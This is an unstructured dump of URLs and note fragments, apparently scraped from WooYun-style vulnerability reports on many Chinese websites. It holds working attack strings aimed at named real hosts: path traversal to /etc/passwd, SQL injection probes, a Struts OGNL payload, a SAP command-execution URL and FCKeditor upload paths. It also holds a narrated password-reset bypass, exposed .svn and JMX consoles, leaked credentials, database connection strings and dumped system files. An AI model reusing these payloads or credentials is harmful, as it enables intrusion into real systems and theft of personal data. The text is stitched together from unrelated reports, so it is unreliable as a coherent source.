http://**.**.**.**/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=228cVVVRBQUDVgIDVAFSVFQJVAAIVwRbBVUCWFxHDFQMAx8VFj5UQEcObVgBQA1nNnE4YlVNZlx8AW0LElASRkZbSVcDGUJySSFHQ1IOZg http://**.**.**.**/index.php?m=dbsource&c=call&a=get&id=9 http://www.zzvcom.com/.svn/entries http://www.zzvcom.com/cms/admin/login.action http://**.**.**.**/News/NewsSearch.aspx?Search=a http://ses.sf-express.com/RecoveryPassword.aspx 
http://bj.feiren.com/gul2/?act=create&category=*&mod=news http://register.csairholiday.com/casUserManager/user/reset.do?mhd=resetpassword https://**.**.**.**/por/login_psw.csp www.51tr.com/zixunlist.php?class=8 http://127.0.0.1/1.html,代码如下: http://www.qq.com http://git.team.cnblogs.com/zhangkun/CNBlogsApp/tree/master/CNBlogsApp/CNBlogsApp url:http://**.**.**.**/news_content.php?id=3087 http://59.175.217.206/cloudstor/ http://59.175.217.204/EntApp4.0/Login.aspx http://59.175.217.202/login/Login.aspx?color=Blue http://www.changan-mazda.com.cn/mediareports/index?page=2&year=1 http://www.metromall.cn/account/addressinfo.aspx?ContactorID=7219 www.metromall.cn www.baidu.com/link%3Furl%3DoPyiQ3wJGqEF3KdVTLEge0VjRCUb7dCReJ3VwCp2vPX5YyDxC1Oe2xuaT2mz3FZO%26wd%3D%26eqid%3Db3fc0e9e000101010000000556013a31 www.metromall.cn/ http://www.metromall.cn/account/addresslist.aspx http://**.**.**.**/ http://www.bizcn.com/login?module=memberzone www.bizcn.com http://www.changan-mazda.com.cn/search?q=1* www.touzhu.cn/news/newslist/*/_1.html www.touzhu.cn/customer/ajax_findpass.php/actionc=checknickname&nickname=*&suijishu=0.10779594886116683&username=e http://www.touzhu.cn:80/ DC1506772BE8531E2289EA15456B3920:FG=1 www.touzhu.cn bj.feiren.com/tour/?id=51&idtype=*&limit=12&mod=comment http://chana-mazda.dma.cig.com.cn/index http://**.**.**.**/siteserver/login.aspx http://www.51bi.com/bbs/ URL:http://**.**.**.**/page/infoc.jsp?id=5058 http://**.**.**.**/commix/product/article_info.jsp?contentId=405 http://**.**.**.**:8080/ http://photo.uestc.edu.cn/image.php?path= http://photo.uestc.edu.cn/image.php?path=/etc/passwd http://photo.uestc.edu.cn/image.php?path=/var/www/admin/application/config/database.php http://**.**.**.**/party/listAction!listTB_XXFB_Djkw.action?type=djkw_type www.auto.uestc.edu.cn/examples/servlets/servlet/SessionExample http://www.haijia.com.cn/ http://www.haijia.com.cn/admin,但是没有用户名密码,wtf http://**.**.**.**/ cd:56:dd http://www.eapchina.net/lenovo/ 
http://**.**.**.**/)登录页面存在验证码设计缺陷,存在爆破风险。 https://**.**.**/por/service.csp http://eservice.foxconnchannel.com/ jdbc:oracle:thin:@**.**.**.**:1521:fzjf1 http://www.med66.com/,如图所示: http://test.med66.com/national/login/view.do?op=goLogin,如图所示: http://qz.med66.com/QUIZ/login/goLogin.action,如图所示: http://test.med66.com/examweb/zhengshi/paper/paperView.jsp http://test.med66.com/examweb/deqin/paper/paperView.jsp http://test.med66.com/examweb/exercise/paper/paperView.jsp http://test.med66.com/examweb/zhengshi/paper/paperView.jsp https://123.127.254.80/por/login_psw.csp http://ijiaxiaoqu.foxconn.com/ http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=%E8%88%B9%E4%B8%9C%E4%BB%A3%E8%A1%A8 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=00020&v_positionOne=00020&v_positionTwo=&v_positionThree=&v_hopeAddress=2002&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key= http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=%E7%BE%8E%E7%94%B2%E5%B8%88 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=%E9%87%87%E8%B4%AD%E4%B8%BB%E7%AE%A1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=CAD 
http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=88 http://signliba.liba.com/.svn/entries http://images.ellechina.com/.svn/entries http://oa.998.com/homepage/LoginHomepage.jsp?hpid=21 http://sqlmap.org http://inner.800bestex.com:8090/manage/index.jsp http://inner.800bestex.com:8090/admin/index.jsp http://inner.800bestex.com:8090/newsManage.do?method=getDepList&resultPage=getDepPage http://oa.mfc.com.cn:81//page/maint/login/Page.jsp?templateId=18 https://**.**.**.**/prx/000/http/localhost/login http://**.**.**.**:88/skxy/front/vote!showById.action http://**.**.**.**/hkwx/loginController.do?login https://221.133.237.231/prx/000/http/localhost/welcome www.zgrljyw.com/wshwpt.php_ http://cp.super8.com.cn/Hotel/List http://cp.super8.com.cn/ https://**.**.**.**/prx/000/http/localhost/login http://**.**.**.**/bugs/wooyun-2010-0121304 
http://**.**.**.**/bugs/wooyun-2010-0121058 http://**.**.**.**/pkpmbs/jdmanage/standingbookTjlist.aspx?SUBMIT_TYPE=0&queryid=1&lzstat_uv=34338219962842780482|1738820&__back2accountQueryList=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/standingbookTjlist.aspx?SUBMIT_TYPE=0&queryid=1&lzstat_uv=34338219962842780482|1738820&__back2accountQueryList=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/standingbookTjlist.aspx?SUBMIT_TYPE=0&queryid=1&lzstat_uv=34338219962842780482|1738820&__back2accountQueryList=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/mall-web/busiNotice/list右下角有个在线实名验证的网站,需要调整地区为广东才能看到。 http://**.**.**.**/bugs/wooyun-2014-088669就能拿到189W+公民姓名,身份证和家庭住址。 http://update.968309.com/.svn/entries http://m.lib.tsinghua.edu.cn/thulibxhtml/jsp/innopac/booksearch_1.jsp?bookfield=t&searchscope=5&bookkeyword=ddddddd&sortorder=-&numperpage=10&flag=Y url:http://**.**.**.**/list.php?id=110 http://**.**.**.**/list.php?id=110 www.job168.com url:http://**.**.**.**/News/NewsSearch.aspx?Search=1 http://admin.cbnweek.com/index.php?url=../../../../../../../../../../etc/passwd%00.jpg http://113.16.174.145:8808/system/login!login.action http://113.16.174.145:8808/guige.jsp http://service.sflep.com:80/ http://**.**.**.**:8081/ShowDetail.aspx?d=1018&id=XWHUST201305210000018201&m=XWHUST201305210000018201%27and%20%271%27=%2712&t=%E5%85%B3%E4%BA%8EM~2%E5%8F%82%E6%95%B0%E7%9A%84%E7%A0%94%E7%A9%B6%27&y=2000%27 http://**.**.**.**/ShowDetail.aspx?d=1016&id=QKC20152015062500049869&m= http://**.**.**.**:8080/ShowDetail.aspx?d=1020&id=SNAD000001499225&m=SNAD000001499225&t=AK%20M%E7%B3%BB%E5%88%97%E7%9B%98%E5%BC%8F%E5%89%8D%E8%BD%AC%E5%90%91%E6%A1%A5%E6%80%BB%E6%88%90&y= http://**.**.**.**/ShowDetail.aspx?d=1020&id=91218739&m= http://www.968309.com/yinyitong/index.html http://58.215.43.21:8080/ 
http://58.215.43.21:8080/invoker/JMXInvokerServlet http://act.vip.xunlei.com/waplogin/login.html?url=http%3A%2F%2Fjifen.xunlei.com%2Fweixinservice%2Fexchanges%2F http://act.vip.xunlei.com/kfweixin/?openId=orWeAjsn10Nin0w0vq7wPgbfbrrE&createTime=1442980310&sign=ce4abe537b8f2b1646ed6b4aadfea203 http://**.**.**.**/autoclaim/ http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp?filep=/../../../../../../../../../../../../etc/passwd https://www.wzdai.com/gyb/trade/allTrade.html?page=null&order=1&projectName=all&username=e&priceArea=0&tradeToken=%20&callback=jQuery1113033065438410267234_1442924018943 http://mdm.digitalchina.com:8080/ http://zhifu.mobage.cn http://**.**.**.**/Dept/news.jsp?item_id=100605 http://**.**.**.**/web/index.html http://d.968309.com/ http://219.143.213.189/newlogon.aspx http://supplier.digitalchina.com/jsp/Logout.jsp http://202.108.145.38:8080/j_security_check http://202.108.145.246/ http://**.**.**.**/search.asp http://m.mfa.go.th/ajax/ajaxOrgMember.php?dID=N,遍历N即可(我遍历到了300) http://www.968309.com/ http://www.968309.com/user.php?act=opc_order_detail&opcorder=OPCO201303040000000211 http://www.968309.com/user.php?act=opc_order_detail&opcorder=OPCO201509220000000201 http://www.968309.com/user.php?act=opc_order_detail&opcorder=OPCO201509250000000002 http://minanins.com/maechannel/ebiz/index.do http://e-policy.minanins.com/prod/grzh.html http://58.60.230.90/ URL:http://m.lvmama.com/static/zt/3.0.0/1508/guoqing/?from=timeline&isappinstalled=1 username:6bazx25 password:123456 http://**.**.**.**/news.asp?tid=21 http://**.**.**.**/epiao/busSearch.do url:http://robot.dev.game.yy.com/errorlog/index.do http://ba.51web.com/ http://ba.51web.com http://**.**.**.**/android/info/300002742389.html http://service.hotwater.com.cn:8099/login.asp http://service.hotwater.com.cn:8099/repair/ReturnDemand.asp?startdate=2011-5-21&enddate=2015-6-20&teamid=4B917&ope=1 
http://service.hotwater.com.cn:8099/CCCByInstTeam/WebForm1.aspx?insteamid=4A660 http://service.hotwater.com.cn:8099/query/QueryAccountAddress_Save.asp?accountid=150312000757 http://service.hotwater.com.cn:8099/CCCByInstTeam/Present_apply.aspx?userid=Q3TR8A00BKGK http://service.hotwater.com.cn:8099/CCCByInstTeam/WebDDYPJ.aspx?userid=QHT5VA001WA4 http://**.**.**.**/,如图所示: http://**.**.**.**/client/clientLoginAction_loginUI.action,如图所示: http://mla.hotwater.com.cn/sdyd http://mla.hotwater.com.cn/manager/html http://mail189.dooland.com/cp_brand.php?id=39 http://g.91huayi.com:80/ http://www.zzvcom.com/.svn/entries svn://192.168.13.10/svn/PSIP1.0/Code/CMS_5.1/web/ROOT.war svn://192.168.13.10/svn/PSIP1.0 svn:special svn:externals svn:needs-lock http://**.**.**.**/admin/OALogin https://**.**.**.**/存在弱口令 https://**.**.**.**/存在弱口令 http://**.**.**.**/user/Home.action http://**.**.**.**/autoclaim http://**.**.**.**/autoclaim/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../jsp/manager http://**.**.**.**/autoclaim/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://www.4over6.edu.cn/upload.php http://www.4over6.edu.cn/imageSample/20150922222052mail.php URL:http://www.lvmama.com/zt/promo/shiyi7/#dianPin http://180.153.176.55:8080 http://crm.haolyy.com/ http://api.acfun.tv/apiserver/profile?userId=967910 http://www.ourteacher.com.cn/admin/,进入后台可上传ashx文件,利用ashx生成asp,可写入任意代码 http://**.**.**.**:80/login.aspx http://**.**.**.**:8083/QiKanEng_ShouYe.aspx?journalId=EnJour00092466&y=2005 http://**.**.**.**:8080/QiKanEng_ShouYe.aspx?journalId=EnJour00013278 http://**.**.**.**/QiKanEng_ShouYe.aspx?journalId=EnJour00092466 http://**.**.**.**:8100/QiKanEng_ShouYe.aspx?journalId=EnJour00092466 http://**.**.**.**/QiKan_ShouYe.aspx?journalId=J0389 http://**.**.**.**:8090/QiKan_ShouYe.aspx?journalId=J01478 
http://**.**.**.**:8100/QiKan_ShouYe.aspx?journalId=J01149 http://**.**.**.**:8083/QiKan_ShouYe.aspx?journalId=J01478 http://**.**.**.**:8080/QiKan_ShouYe.aspx?journalId=J01339 http://202.96.11.40/Citrix/XenApp/site/default.aspx?CTX_MessageType=SUCCESS&CTX_MessageKey=UsableClientDetected user:test pass:test进去了 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://219.139.240.89:321 http://219.139.240.89:6801 http://eps.zzvcom.com/custom/groupnewslist.aspx?buyGroupId=&child=true&groupId=149 http://**.**.**.**/ http://**.**.**.**:8080/irj/portal/ http://**.**.**.**:8080//ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id http://*/autoclaim/jsp/picture/picture_stream.jsp http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp?filep=/../../../../../../../../../../../../etc/passwd http://**.**.**.**/STRCWeb/index.jsp?module=RegCenter&id=show&serial=EF3E7A6B-41B5-4CF0-95D1-B1B493726EA6&chuan=1 http://office.mingyi.com.cn/txl/manage/login.aspx http://**.**.**.**/column.php?column=%E5%85%A8%E6%99%BA%E8%B4%A4%E5%90%8C%E6%AC%BE&type=women http://www.jiuhuashan.cc/expand_ticket/?tcid=4 http://121.8.169.133/search_cata.aspx http://dv.56.com/ http://**.**.**.**/ POSThttp://**.**.**.**/test.aspx http://**.**.**.**/通过跑一处链接,跑到支付官网的数据库,跑了下会员表,近3W会员 http://ctrl.69shequ.com/qbadmin/menu/baseSet http://zijia.lvmama.com http://**.**.**.**/ http://**.**.**.**/uf http://**.**.**.**/uf/Uploads/MemberData/ http://**.**.**.**:80/ cgP9W8BOY4yg6UXdsNgPHY:13nc2bp3u http://**.**.**.**/case/caselist.aspx http://**.**.**.**/myorder.aspx http://**.**.**.**/myorder.aspx http://**.**.**.**/myorder.aspx http://**.**.**.**/myorder.aspx 
https://**.**.**.**/bulletlu/meyes-server/blob/2297f669cd1b095a151580d10d75d755b2db52fc/src/main/resources/server.properties http://www.state-dr.com/viewproduct.php?productid=304 http://sywsw.91huayi.com/Page/InfoView.aspx?lm=ZCXX&id=54 http://**.**.**.**/account/regstep1 http://**.**.**.**/account/findpwd?from=http://**.**.**.**/ http://**.**.**.**/account/resetpwd?email=2602462006@**.**.**.**&gid=5b754e490080cc4b&from=http://**.**.**.**/ URL:http://ssp.baidu.com//ce.wooyun.org http://ssp.baidu.com= http://ssp.baidu.com/home http://ssp.baidu.com,网站会跳转到/home页面,但HOST值是从最后一个//后取的而不是第一个// http://ssp.baidu.com后面加上//然后再加任意站点都可以跳转,当然正常打开的前提是跳转的站点要有/home这个页面 http://**.**.**.**/News/Detail.aspx?NewsID=1173&ModuleNo=0301 http://**.**.**.**/News/Detail.aspx?NewsID=1173%27%20and%20%27%27=%27&ModuleNo=0301 http://**.**.**.**/News/Detail.aspx?NewsID=1173%27%20and%20%271%27=%27&ModuleNo=0301 http://www.tjsoc.com/ http://www.tjsoc.com:80/ http://**.**.**.**/ ipsec.bak/tun/add_tun_write.php ipsec.bak/usertun/add_tun_write.php root:/bin/csh Superuser:/root processes:/root:/usr/sbin/nologin Source:/:/usr/sbin/nologin Sandbox:/:/usr/sbin/nologin Sandbox:/:/usr/sbin/nologin pseudo-user:/usr/games:/usr/sbin/nologin Subsystem:/:/usr/sbin/nologin Pages:/usr/share/man:/usr/sbin/nologin Daemon:/var/empty:/usr/sbin/nologin User:/var/spool/clientmqueue:/usr/sbin/nologin User:/var/spool/mqueue:/usr/sbin/nologin Sandbox:/:/usr/sbin/nologin pseudo-user:/nonexistent:/usr/sbin/nologin user:/var/empty:/usr/sbin/nologin programs:/var/empty:/usr/sbin/nologin pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico Owner:/nonexistent:/usr/sbin/nologin Owner:/nonexistent:/usr/sbin/nologin user:/nonexistent:/usr/sbin/nologin ipsec.bak/tun/add_tun_write.php ipsec.bak/tun/wooyun.txt cd:56:d7 http://**.**.**.**/ http://**.**.**.**/ http://115.29.202.192:7001/prlife-jfmall/index.shtml http://jifen.prlife.com.cn/prlife-jfmall/test.jsp jdbc:oracle:thin:@115.29.200.242:1521:dev 
jdbc:oracle:thin:@115.29.200.242:1521:dev jdbc:oracle:thin:@115.29.200.242:1521:dev jdbc:oracle:thin:@**.**.**.**:1521/bjdc http://**.**.**.**/index.html http://**.**.**.**:801/ http://**.**.**.**:801/messager/users.data http://www.spider.com.cn/forgetPassword.html,输入想要重置的邮箱,点击“下一步”,抓包,记录响应包中的长串字符串,再用自己已经注册账号正常进行找回密码,进入自己邮箱,找回密码链接为http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=599748&spsign=34025FBB8751D3F6F443DB128F4223A3F8BB2012E09BD5E8&sign=2AF2***************************C9D,将直接记录下的字符串代入sign,就可以重置想要修改密码的账号,这里我将admin@qq.com账号的密码修改成了admin123456,将官方客服账号kf@spider.com.cn的密码修改成了kf123456。 http://**.**.**.**:9010/web http://**.**.**.**:9010/main http://**.**.**.**:9012 http://**.**.**.**/Reception/evaluation-1.html http://study.**.**.**.**/myPaper/dk_ShowImage.aspx?ModuleID=103&srId=470 http://cmnerm.minmetals.com.cn http://cmnerm.minmetals.com.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL http://**.**.**.**/ http://www.zzvcom.com/cms/admin/index.action http://www.zzvcom.com/cms/admin/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**/ http://**.**.**/ http://www.sanhao.com/orderpay.php?id=109&course=31043&cnum=1,参数course存在注入,此处直接加and语句会提示“请求存在安全风险”,经过测试,发现没有过滤掉"/",“/”下面“case http://ptmes.saicmotor.com/ http://ptmes.saicmotor.com:9090/ http://ess.cninsure.net/portal/product/get_product_list!initRiskList.action?area=110000&pageSize=12&producttype=1 http://61.161.193.183:81/ http://61.161.193.183:81 http://portal.mobage.cn/index.php?c=user_basic&m=dochange_password 
http://119.15.138.114:8000/bin/?phpinfo=1 http://119.15.138.114:8000/html/ http://119.15.139.55:8000/search http://119.15.139.103:8002/ http://home.dongfeng.net/ http://home.dongfeng.net/as/upimg.asp http://**.**.**.**/.git https://nfltc.sflep.com:443/index.php?Itemid=10&torscatid=2&option=com_rubberdoc&view=list https://ad.sflep.com:443/index.php?Itemid=10&limitstart=30&torscatid=1&option=com_rubberdoc&view=list https://m.sflep.com:443/index.php?Itemid=10&limitstart=30&torscatid=1&option=com_rubberdoc&view=list https://hee.sflep.com:443/index.php?Itemid=10&limitstart=10&torscatid=2&option=com_rubberdoc&view=list https://service.sflep.com:443/index.php?Itemid=10&torscatid=2&option=com_rubberdoc&view=list https://sbs.sflep.com:443/teacherInfo.php?tid=95 https://sbs.sflep.com:443/articleList.php?classid=6 https://sbs.sflep.com:443/commendList.php?tid=1 https://sbs.sflep.com:443/schoolInfo.php?action=introduce&sid=66 https://sbs.sflep.com:443/resourceList.php?action=show&rid=158 https://sbs.sflep.com:443/newsList.php?classid=1 https://sbs.sflep.com:443/newsList2.php?classid=7 https://sbs.sflep.com:443/commendInfo.php?cid=6 https://sbs.sflep.com:443/articleList.php?classid=6 http://202.136.214.195:8082/register.aspx?action=checkInviteCode&code=angelina http://**.**.**.**/up/201209/ http://**.**.**.**/up/201201/ http://**.**.**.**:80/ http://m.xin.com:80/car/get_st_info/ http://www.9666.cn http://fenxiao.lvmama.com/m/index.jsp http://fenxiao.lvmama.com/m/order_list.jsp?state=1 http://fenxiao.lvmama.com/m/order_show.jsp?order_id=4581045 http://fenxiao.lvmama.com/m/2/list0.jsp?area_id=10034&order_cust_id=285818&user_id=123456 http://www.helloan.cn/ http://www.helloan.cn/process/findhc/hcs http://**.**.**.**/users/history_view/11316740 http://sy.crland.com.cn/admin@manager/login.php http://nc.emar.com/axis2/axis2-admin/login http://oa.ccib.com.cn/main.asp http://oa.ccib.com.cn/NewRegisterDo.asp http://180.97.69.170:8080/ 
http://**.**.**.**/NewsNormalList.aspx?SearchType=1&SearchKey=1有对sql关键字进行过滤,但忽略大小写可注入,如输入and http://haiertv.cn/appstoreView/index.xhtml http://180.97.70.61:8090/Login.aspx http://**.**.**.**/web/infor.aspx?cid=8 http://**.**.**.**/wssb/ http://**.**.**.**/ http://www.208521.com/index.php?m=sys&v=admin_show http://**.**.**.**/cpthd/user/login.action http://cloud.968309.com/wxapp/index.php?c=Webpacs&wechat_id=25 http://218.17.200.230:8080/gw/user/ http://218.17.200.230:88/?q=base http://oa.hismarttv.com/userLogin/user_index.php http://mail.hisense.com/ https://ssl.hisense.com/+CSCOE+/logon.html http://**.**.**.**/leadership.asp https://github.com/victor-han/yixin_youngpioneer4 https://github.com/victor-han/yixin_youngpioneer4/blob/34fbe6bdcfde130a4099ef74a940708eb4fcb30d/target/yomisupply/WEB-INF/classes/prod/db.properties jdbc:mysql://10.120.146.214:3306/yixin_youngpioneer https://github.com/victor-han/yixin_youngpioneer4/blob/34fbe6bdcfde130a4099ef74a940708eb4fcb30d/target/classes/applicationContext-ip.xml https://github.com/victor-han/yixin_youngpioneer4/blob/master/Servers/Pivotal%20tc%20Server%20Developer%20Edition%20v3.1-config/jmxremote.password http://oa.**.**.**.**/vmeet/wbUpload.php?fileName=test.php+ http://**.**.**.**/bugs/wooyun-2015-0135774 http://58.62.201.210/ http://wan.deyi.com/ http://wan.deyi.com/web/coupon?id=608 http://**.**.**/RoadAdmin/ http://**.**.**/console/login/LoginForm.jsp http://**.**.**/ma/ma3.jsp http://**.**.**/showthread.phpt=156643 http://**.**.**/dis9_tysan http://**.**.**.**/UserManage/Login.aspx?FindPwd www.springcocoon.com/Search.aspx www.springcocoon.com http://www.springcocoon.com http://www.weedai.com:80/dangan/index.html?province=1 http://**.**.**.**/into/Search.aspx?KeyWord= http://**.**.**.**/article.php?id=298 http://**.**.**.**/list.php?id=18 http://**.**.**.**/manager/index.php不做进一步测试了。。 http://**.**.**.**/cpzt/kcproduct.jsp?where=&Type=004004&pros= http://**.**.**/ https://**.**.**.**/etrading/F5testw.jsp 
http://www.faw-vw.com/autoparts Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 http://www.hhrfs.com/notice/index?p=* http://www.qdmixc.com/ http://www.qdmixc.com/robots.txt http://**.**.**.**/bugs/wooyun-2010-0123096 http://**.**.**.**/infodisplay.do?method=getOneInfoDisplay&infoid=42112e27:14350bcb20a:-7ff2 http://www.dfsszc.com/ http://www.dfsszc.com/NewsList.aspx?m=20131120105112043638%27%20AND%208228=8228%20AND%20%27we8%27=%27R0we8 http://www.dfsszc.com/NewsList.aspx?m=20131120105112043638%27%20AND%208228=8228%20AND%20%27we8%27=%27we8 http://www.dfsszc.com/NewsList.aspx?m=20131120105112043638%27%20AND%208228=8228%20AND%20%27we8%27=%27R0we8 http://oa.guanghui.com/ http://oa.guanghui.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.guanghui.com/null1.jsp http://**.**.**.**/webhall/NewsDatail3.aspx?Id=198231 http://www.politics.fudan.edu.cn/viewprofile.php?id=1357 http://sces.tongji.edu.cn/firstLoginRst.jsp http://ilife.homelink.com.cn/aigou/admin.php?m=Index&a=login http://oa.xsdzq.cn/C6/Jhsoft.Web.login/PassWordSlide.aspx http://oa.xsdzq.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1* http://oa.xsdzq.cn/C6//JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123456* http://**.**.**.**/bugs/wooyun-2010-098655直接上传获得一句话 http://**.**.**.**:8080/netinnet_cwgl_v60/userfiles/common/File/D70E068BDBE6321D00000002499030.jsp Id:0;996 Package:Negotiate User:iZ23aan1aamZ$ Domain:WORKGROUP Id:0;607032965 Package:Negotiate User:DefaultAppPool Domain:IIS Id:0;5049057 Package:NTLM User:Administrator Domain:iZ23aan1aamZ Id:0;997 Package:Negotiate User:LOCAL Id:0;24602 Package:NTLM http://kfgl.hasee.com/news/Play.asp?id=120 jdbc:oracle:thin:@**.**.**.**:1521:csb http://**.**.**.**/ ipsec.bak/cert/cert_req.php?arg=create ipsec.bak/cert/import_cert.php cd:56:d7 http://lzg.cninsure.net/oauth/sql/.svn/entries http://www.jk309.net/resource/.svn/entries http://www.jk309.net/.svn/entries 
http://bbs.968309.com/archiver/.svn/entries http://bbs.968309.com/source/plugin/.svn/entries http://bbs.968309.com/source/.svn/entries http://bbs.968309.com/static/.svn/entries http://bbs.968309.com/static/image/.svn/entries http://bbs.968309.com/uc_server/.svn/entries http://www.jk309.cn/server-status http://lyh.968309.com/server-status http://www.jk309.net/server-status http://km.crv.com.cn/km/ http://vacation.homsom.com/Order/TravelOrderDetail?travelNumber=TB000020418 http://vacation.homsom.com/Order/TravelOrderDetail?travelNumber=TB000020419 http://vacation.homsom.com/Order/TravelOrderDetail?travelNumber=TB000020420 http://www.sun-hoo.cn/ http://**.**.**.**/welcome/Article_Print.asp?ArticleID=821 http://**.**.**.**/welcome/admin_index.asp http://**.**.**.**/bugs/wooyun-2015-0143242 http://www.sinosig.com/payment_weixinPageUrl.action?orderNo=P270000150508821605&source=wx&sso=false http://www.sinosig.com/payment_weixinPageUrl.action?orderNo=P270000150508821$i http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part 
http://**.**.**.**:8080/themelist.php?web=jkldfdfdf24df4er4fgrtere32kk565655kjk3l4j34ytytv5jkl65jkl4j43l343l4j3l4j3jkl4j3l4j3l4j4jerkl4jklkjkld&class=&code=1%27%3B&class=part http://cuc.dooland.com/site/magazine/head_brand.php?l=A&t=0.029984969412907958 http://**.**.** http://220.181.105.91:8888/download/uploadAttachement/1414058226036/bmp_sy_test.bmp http://220.181.105.91:8888/download/144/ http://220.181.105.91:8888/download/144/29/94277420/ http://220.181.105.91:8888/download/144/28/90767358/ http://220.181.105.91:8888/download/144/30/85474937/ http://**.**.**.**/claim-jy/LoginServlet http://**.**.**.**/claim-jy/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/../ http://**.**.**.**/claim-jy/editor/filemanager/browser/default/frmupload.html http://**.**.**.**/service/index.jsp http://**.**.**.**/member/reg.asp http://**.**.**.**/index.php/commonform-showmsg.html?id=113 